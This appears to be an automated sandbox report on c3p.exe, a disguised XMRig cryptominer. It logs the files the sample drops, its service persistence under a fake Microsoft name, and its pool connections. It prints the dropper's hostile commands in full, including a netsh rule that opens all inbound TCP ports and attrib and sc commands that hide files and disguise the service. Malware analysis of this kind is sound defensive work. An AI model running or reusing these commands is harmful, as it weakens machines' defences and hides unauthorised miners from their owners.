                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                Source: c3p.exeStatic file information: File size 3127301 > 1048576
                Source: c3p.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: c3p.exe
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmp, WinRing0x64.sys.2.dr
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004252D5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_004252D5
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\__tmp_rar_sfx_access_check_6055437Jump to behavior
                Source: systems.exe.2.drStatic PE information: section name: .xdata
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041A05C push eax; ret 2_2_0041A07A
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041F6A1 push ecx; ret 2_2_0041F6B4
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00416ABD push ecx; ret 5_2_00416AD0
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_00416ABD push ecx; ret 9_2_00416AD0

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\svchost.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\debug\c3p\svchost.exeJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeExecutable created and started: C:\Windows\debug\c3p\systems.exeJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\WinRing0x64.sysJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: attrib.exeJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\svchost.exeJump to dropped file
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\WinRing0x64.sysJump to dropped file
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\systems.exeJump to dropped file
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\svchost.exeJump to dropped file
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\WinRing0x64.sysJump to dropped file
                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\systems.exeJump to dropped file
                Source: C:\Windows\debug\c3p\svchost.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Networks2\ParametersJump to behavior
                Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00409B70 __fileno,__setmode,__fileno,__setmode,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,5_2_00409B70
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"
                Source: C:\Users\user\Desktop\c3p.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\debug\c3p\systems.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\debug\c3p\systems.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeCode function: HeapAlloc,OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,GetLastError,EnumServicesStatusW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusW,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetLastError,__snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0040CAB0
                Source: C:\Windows\debug\c3p\svchost.exeCode function: HeapAlloc,OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,GetLastError,EnumServicesStatusW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusW,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetLastError,__snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,9_2_0040CAB0
                Source: C:\Users\user\Desktop\c3p.exeDropped PE file which has not been started: C:\Windows\debug\c3p\WinRing0x64.sysJump to dropped file
                Source: C:\Windows\debug\c3p\svchost.exeEvaded block: after key decisiongraph_9-12049
                Source: C:\Windows\debug\c3p\svchost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_9-11347
                Source: C:\Windows\debug\c3p\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-10430
                Source: C:\Users\user\Desktop\c3p.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-18769
                Source: C:\Windows\debug\c3p\svchost.exeAPI coverage: 3.0 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004091FE FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_004091FE
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040DB4F SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_0040DB4F
                Source: c3p.exe, 00000002.00000002.1358888782.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: c3p.exe, 00000002.00000002.1358888782.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: systems.exe, 0000000F.00000002.2581684735.000001A465959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: c3p.exeBinary or memory string: jVMci
                Source: svchost.exe, 00000000.00000002.2581480577.00000173B3431000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041E29E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041E29E
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004252D5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_004252D5
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_0040EC60 __snwprintf_s,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError,5_2_0040EC60
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0042308E SetUnhandledExceptionFilter,2_2_0042308E
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041E29E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041E29E
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00423B49 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,2_2_00423B49
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041FB9B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041FB9B
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00412CDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00412CDC
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_0041BD69 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0041BD69
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00415360 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00415360
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_004187C4 SetUnhandledExceptionFilter,5_2_004187C4
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_00412CDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00412CDC
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_0041BD69 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0041BD69
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_00415360 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00415360
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_004187C4 SetUnhandledExceptionFilter,9_2_004187C4
                Source: C:\Users\user\Desktop\c3p.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc description "Networks2" "Microsoft Windows Networks"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start "Networks2"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p +h +aJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.json +h +a +s +rJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.exe +h +a +s +rJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allowJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeProcess created: C:\Windows\debug\c3p\systems.exe "C:\WINDOWS\Debug\c3p\systems.exe" Jump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00409920 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00409920
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00410A5D cpuid 2_2_00410A5D
                Source: C:\Users\user\Desktop\c3p.exeCode function: GetLocaleInfoA,2_2_00425AB0
                Source: C:\Users\user\Desktop\c3p.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_0040CE48
                Source: C:\Windows\debug\c3p\svchost.exeCode function: GetLocaleInfoA,5_2_0041C465
                Source: C:\Windows\debug\c3p\svchost.exeCode function: GetLocaleInfoA,9_2_0041C465
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00423965 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00423965
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040998E GetVersionExW,2_2_0040998E

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts4
                Native API
                1
                Scripting
                1
                DLL Side-Loading
                2
                Disable or Modify Tools
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                12
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                System Service Discovery
                Remote Desktop ProtocolData from Removable Media1
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts13
                Service Execution
                44
                Windows Service
                44
                Windows Service
                2
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared Drive2
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                Process Injection
                1
                Software Packing
                NTDS33
                System Information Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets221
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion
                Cached Domain Credentials1
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Masquerading
                DCSync1
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1456175 Sample: c3p.exe Startdate: 12/06/2024 Architecture: WINDOWS Score: 100 42 time.windows.com 2->42 44 auto.c3pool.org 2->44 68 Malicious sample detected (through community Yara rule) 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 Yara detected Xmrig cryptocurrency miner 2->72 74 5 other signatures 2->74 8 c3p.exe 11 2->8         started        12 svchost.exe 2 1 2->12         started        14 svchost.exe 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 file5 34 C:\Windows\debug\c3p\systems.exe, PE32+ 8->34 dropped 36 C:\Windows\debug\c3p\WinRing0x64.sys, PE32+ 8->36 dropped 38 C:\Windows\debug\c3p\cmd.bat, ASCII 8->38 dropped 40 C:\Windows\debug\c3p\svchost.exe, PE32 8->40 dropped 76 Found strings related to Crypto-Mining 8->76 78 Sample is not signed and drops a device driver 8->78 80 Drops PE files with benign system names 8->80 18 cmd.exe 1 8->18         started        82 Drops executables to the windows directory (C:\Windows) and starts them 12->82 21 systems.exe 1 12->21         started        24 conhost.exe 12->24         started        signatures6 process7 dnsIp8 52 Uses cmd line tools excessively to alter registry or file data 18->52 54 Drops executables to the windows directory (C:\Windows) and starts them 18->54 56 Uses netsh to modify the Windows network and firewall settings 18->56 58 Modifies the windows firewall 18->58 26 netsh.exe 2 18->26         started        28 conhost.exe 18->28         started        30 svchost.exe 4 1 18->30         started        32 6 other processes 18->32 46 159.69.83.232, 443, 49715, 49716 HETZNER-ASDE Germany 21->46 48 195.201.97.156, 443, 49706, 49714 HETZNER-ASDE Germany 21->48 50 auto.c3pool.org 88.198.117.174, 443, 49707, 49708 HETZNER-ASDE Germany 21->50 60 Antivirus detection for dropped file 21->60 62 Multi AV Scanner detection for dropped file 21->62 64 Query firmware table information (likely to detect VMs) 21->64 66 Machine Learning detection for dropped file 21->66 signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                c3p.exe68%ReversingLabsWin32.Trojan.DisguisedXMRigMiner
                c3p.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Windows\debug\c3p\systems.exe100%AviraPUA/CoinMiner.bencb
                C:\Windows\debug\c3p\systems.exe100%Joe Sandbox ML
                C:\Windows\debug\c3p\WinRing0x64.sys5%ReversingLabs
                C:\Windows\debug\c3p\svchost.exe8%ReversingLabs
                C:\Windows\debug\c3p\systems.exe87%ReversingLabsWin64.Coinminer.BitCoinMiner
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://xmrig.com/benchmark/%s0%Avira URL Cloudsafe
                https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
                https://xmrig.com/wizard0%Avira URL Cloudsafe
                https://xmrig.com/wizard%s0%Avira URL Cloudsafe
                http://nssm.cc/h0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                auto.c3pool.org
                88.198.117.174
                truefalse
                  unknown
                  time.windows.com
                  unknown
                  unknowntrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://xmrig.com/benchmark/%sc3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://xmrig.com/wizardsystems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://nssm.cc/hsvchost.exe, 00000005.00000000.1347222716.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000009.00000000.1351325044.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://xmrig.com/wizard%ssystems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://xmrig.com/docs/algorithmsc3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    88.198.117.174
                    auto.c3pool.orgGermany
                    24940HETZNER-ASDEfalse
                    195.201.97.156
                    unknownGermany
                    24940HETZNER-ASDEfalse
                    159.69.83.232
                    unknownGermany
                    24940HETZNER-ASDEfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1456175
                    Start date and time:2024-06-12 20:12:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:c3p.exe
                    Detection:MAL
                    Classification:mal100.evad.mine.winEXE@27/7@5/3
                    EGA Information:
                    • Successful, ratio: 75%
